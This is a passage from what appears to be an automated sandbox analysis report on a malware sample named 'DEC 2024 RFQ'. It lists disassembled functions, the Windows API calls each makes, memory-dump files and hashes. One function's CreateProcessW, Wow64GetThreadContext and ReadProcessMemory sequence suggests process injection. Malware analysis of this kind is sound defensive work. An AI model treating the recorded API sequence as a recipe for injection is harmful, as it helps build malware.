                                                                                                                      • _free.LIBCMT ref: 0005E2AA
                                                                                                                        • Part of subcall function 00026A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00026BAD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                      • API String ID: 2861923089-1757145024
                                                                                                                      • Opcode ID: 2f869f21c311bd77b2dc69a6fe43aea29dc5ff3053b40a71111f0d7231f89749
                                                                                                                      • Instruction ID: 1810aa7ad267c1ace7f170529f1f725fec9a5eab3cd351a13169454f988f7776
                                                                                                                      • Opcode Fuzzy Hash: 2f869f21c311bd77b2dc69a6fe43aea29dc5ff3053b40a71111f0d7231f89749
                                                                                                                      • Instruction Fuzzy Hash: 99919271900269DFCF18EFA4DC819EEB7B8FF09311F104429F855AB2A2DB709A55CB54
                                                                                                                      Function 000235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000235A1,SwapMouseButtons,00000004,?), ref: 000235D4
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000235A1,SwapMouseButtons,00000004,?,?,?,?,00022754), ref: 000235F5
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,000235A1,SwapMouseButtons,00000004,?,?,?,?,00022754), ref: 00023617
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                      • Opcode ID: 60ab174540a16fe49397fc72fc2c66fb50e00f91c29c2cdf9218df420558102a
                                                                                                                      • Instruction ID: 2a3ce3604dea90835735dd5e1ef2260aded0f389bc41fd8f90bcc676488f8170
                                                                                                                      • Opcode Fuzzy Hash: 60ab174540a16fe49397fc72fc2c66fb50e00f91c29c2cdf9218df420558102a
                                                                                                                      • Instruction Fuzzy Hash: 59111875611228BFDB208FA4EC48EBFB7BCEF05740F118569E805D7210E6759E509B64
                                                                                                                      Function 0173A490 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0173ACBD
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0173ACE1
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0173AD03
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                      • Instruction ID: 07236fdde6cd27caa947e12515199523331e882fcf9d7f6c12cd453871245fa1
                                                                                                                      • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                      • Instruction Fuzzy Hash: 1F622C70A14219DBEB24CFA4C845BDEB372EF98300F1091A9D10DEB395E7769E81CB59
                                                                                                                      Function 0008955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024EE5: _fseek.LIBCMT ref: 00024EFD
                                                                                                                        • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089824
                                                                                                                        • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089837
                                                                                                                      • _free.LIBCMT ref: 000896A2
                                                                                                                      • _free.LIBCMT ref: 000896A9
                                                                                                                      • _free.LIBCMT ref: 00089714
                                                                                                                        • Part of subcall function 00042D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00049A24), ref: 00042D69
                                                                                                                        • Part of subcall function 00042D55: GetLastError.KERNEL32(00000000,?,00049A24), ref: 00042D7B
                                                                                                                      • _free.LIBCMT ref: 0008971C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1552873950-0
                                                                                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                      • Instruction ID: 2ab92d2c0335ce52d57bcaa7722e1e599d923278d8e8ac8c2d24ed31c66bf368
                                                                                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                      • Instruction Fuzzy Hash: 995132B1D04258ABDF259F64DC41AEEBB79FF48300F1444AEF549A3242DB715A80CF58
                                                                                                                      Function 0004470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2782032738-0
                                                                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                      • Instruction ID: 7734e805009f182c970bc29d4050717703bb05ae10a4e98c645e5c8c3610aeef
                                                                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                      • Instruction Fuzzy Hash: 4641E4F4B04746ABDB28CF69C880AAE77E5EF42360B24857DE815C7641EB70DD428B48
                                                                                                                      Function 00027285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0005EA39
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0005EA83
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                        • Part of subcall function 00040791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000407B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                      • Opcode ID: a0511a65ef580bf49c9d01ef7f7992e0070b0eaafb4a473275872974f2b06b77
                                                                                                                      • Instruction ID: 091f9beaf5cc08e24417dbe2d5cf1eeea5103389da1de0bd85d4973f59810646
                                                                                                                      • Opcode Fuzzy Hash: a0511a65ef580bf49c9d01ef7f7992e0070b0eaafb4a473275872974f2b06b77
                                                                                                                      • Instruction Fuzzy Hash: 5921D870A042589BDF51DF94DC45BEE7BF8AF49715F00401AE908BB242DFB8598D8FA1
                                                                                                                      Function 00088D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: c79943bb2e651deec91029d0f6b70659be152be08620699a2ac2160fee44b51c
                                                                                                                      • Instruction ID: b03b9cb1caa2197fd85b0053771d2cc7bf82e9220484640c0491f1c8275e9bcf
                                                                                                                      • Opcode Fuzzy Hash: c79943bb2e651deec91029d0f6b70659be152be08620699a2ac2160fee44b51c
                                                                                                                      • Instruction Fuzzy Hash: C901F9B18042187FDB28DBA8CC16EFE7BF8DB11311F0041ABF592D2282E874A6048760
                                                                                                                      Function 000898E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 000898F8
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0008990F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: c94a505c3e2af739f1086bde87fd4b30824981c448f77f1f5a315138f6061457
                                                                                                                      • Instruction ID: b037695be6d31ac0aee4b242d0b02ca3b705e533469cc1a0d0f9284fb5761ba6
                                                                                                                      • Opcode Fuzzy Hash: c94a505c3e2af739f1086bde87fd4b30824981c448f77f1f5a315138f6061457
                                                                                                                      • Instruction Fuzzy Hash: 80D05E7954030EABEB509BE0DC0EFEA773CE704701F0042B1BB94951A1EEB495988BA1
                                                                                                                      Function 0009CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3355b75dbdb50d9603c5682628a380dc2bacc19fac6b9774edb3b9203474b680
                                                                                                                      • Instruction ID: 4ee2eb7051ec0684812f06af8eaa03b5c874ecb9a72991675d1b37909192ebeb
                                                                                                                      • Opcode Fuzzy Hash: 3355b75dbdb50d9603c5682628a380dc2bacc19fac6b9774edb3b9203474b680
                                                                                                                      • Instruction Fuzzy Hash: 21F13871A083059FDB14DF28C490A6ABBE5FF89314F54892EF8999B352D730E945CF82
                                                                                                                      Function 0002F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00040193
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0004019B
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000401A6
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000401B1
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(00000011,00000000), ref: 000401B9
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(00000012,00000000), ref: 000401C1
                                                                                                                        • Part of subcall function 000360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0002F930), ref: 00036154
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0002F9CD
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0002FA4A
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000645C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986988660-0
                                                                                                                      • Opcode ID: 86e74cabe9e793d101041eee9bd58af81a069b94dc11975d2722da1ea2fe412f
                                                                                                                      • Instruction ID: 1e40cb35bc1c5b10f4c67597692475c9f7786aeb5ba5882dc640471dd1ddd6c3
                                                                                                                      • Opcode Fuzzy Hash: 86e74cabe9e793d101041eee9bd58af81a069b94dc11975d2722da1ea2fe412f
                                                                                                                      • Instruction Fuzzy Hash: E781C0F0905EC18EA384DF39FD856597AE5BB48B0F750892A9118EF2A2EB7C45808F11
                                                                                                                      Function 0002434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00024370
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00024415
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00024432
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1505330794-0
                                                                                                                      • Opcode ID: 8fd02b385163130d29ca01e3e7c276d331df266647e65762486ac5617fd95545
                                                                                                                      • Instruction ID: b338475c45864f43fdf93bc565c55d258d3ba3e6f880d49676729db25c7ae0f2
                                                                                                                      • Opcode Fuzzy Hash: 8fd02b385163130d29ca01e3e7c276d331df266647e65762486ac5617fd95545
                                                                                                                      • Instruction Fuzzy Hash: CC3191B09047118FD760EF24E88469BBBF8FB49709F000D2EF69A96251E774A948CB52
                                                                                                                      Function 0004571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00045733
                                                                                                                        • Part of subcall function 0004A16B: __NMSG_WRITE.LIBCMT ref: 0004A192
                                                                                                                        • Part of subcall function 0004A16B: __NMSG_WRITE.LIBCMT ref: 0004A19C
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0004573A
                                                                                                                        • Part of subcall function 0004A1C8: GetModuleFileNameW.KERNEL32(00000000,000E33BA,00000104,?,00000001,00000000), ref: 0004A25A
                                                                                                                        • Part of subcall function 0004A1C8: ___crtMessageBoxW.LIBCMT ref: 0004A308
                                                                                                                        • Part of subcall function 0004309F: ___crtCorExitProcess.LIBCMT ref: 000430A5
                                                                                                                        • Part of subcall function 0004309F: ExitProcess.KERNEL32 ref: 000430AE
                                                                                                                        • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
                                                                                                                      • RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: 0cbb64272baa2ee7b5a7e31fa9ba7f678b2ac30cd43e29f1ca55ea5dfb645856
                                                                                                                      • Instruction ID: 1932dd592f77310e31f2ef5ceb9ff23917cc642eb6135f88bcf91e8dcd38cadf
                                                                                                                      • Opcode Fuzzy Hash: 0cbb64272baa2ee7b5a7e31fa9ba7f678b2ac30cd43e29f1ca55ea5dfb645856
                                                                                                                      • Instruction Fuzzy Hash: 3C01D2F1248A01EFE6503B34BC86AAE77888F42763F100539F545AB193DF748D00476D
                                                                                                                      Function 000898A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00089548,?,?,?,?,?,00000004), ref: 000898BB
                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00089548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000898D1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00089548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000898D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: 1eb6199764db9ca3ee88c54aad16e40df1a57ec20438aa024c2ea35fd48f62f0
                                                                                                                      • Instruction ID: dfc3bc79943501399b7a05010e47f8538ae0580a2f7325ee801d8c740e91933c
                                                                                                                      • Opcode Fuzzy Hash: 1eb6199764db9ca3ee88c54aad16e40df1a57ec20438aa024c2ea35fd48f62f0
                                                                                                                      • Instruction Fuzzy Hash: AAE08632240615FBEB312B94EC09FEA7B59AB07760F144120FB54690E087B516119798
                                                                                                                      Function 00088D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00088D1B
                                                                                                                        • Part of subcall function 00042D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00049A24), ref: 00042D69
                                                                                                                        • Part of subcall function 00042D55: GetLastError.KERNEL32(00000000,?,00049A24), ref: 00042D7B
                                                                                                                      • _free.LIBCMT ref: 00088D2C
                                                                                                                      • _free.LIBCMT ref: 00088D3E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction ID: b6549aa22afe93fca79f21e4f76ee5979c1a0e962362c2437857b993f0fcac7f
                                                                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction Fuzzy Hash: 8AE012E1B0170156CB64B578A940AD313DC5F58392F94492DB44DD7187DE64F882832C
                                                                                                                      Function 0002A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
